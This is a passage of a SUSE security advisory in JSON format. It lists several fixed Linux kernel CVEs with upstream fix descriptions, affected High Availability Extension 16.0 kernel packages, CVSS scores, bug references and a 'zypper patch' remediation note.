\"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68802",
"url": "https://www.suse.com/security/cve/CVE-2025-68802"
},
{
"category": "external",
"summary": "SUSE Bug 1256661 for CVE-2025-68802",
"url": "https://bugzilla.suse.com/1256661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "low"
}
],
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68811",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68811"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: use rc_pageoff for memcpy byte offset\n\nsvc_rdma_copy_inline_range added rc_curpage (page index) to the page\nbase instead of the byte offset rc_pageoff. Use rc_pageoff so copies\nland within the current page.\n\nFound by ZeroPath (https://zeropath.com)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68811",
"url": "https://www.suse.com/security/cve/CVE-2025-68811"
},
{
"category": "external",
"summary": "SUSE Bug 1256677 for CVE-2025-68811",
"url": "https://bugzilla.suse.com/1256677"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68811"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
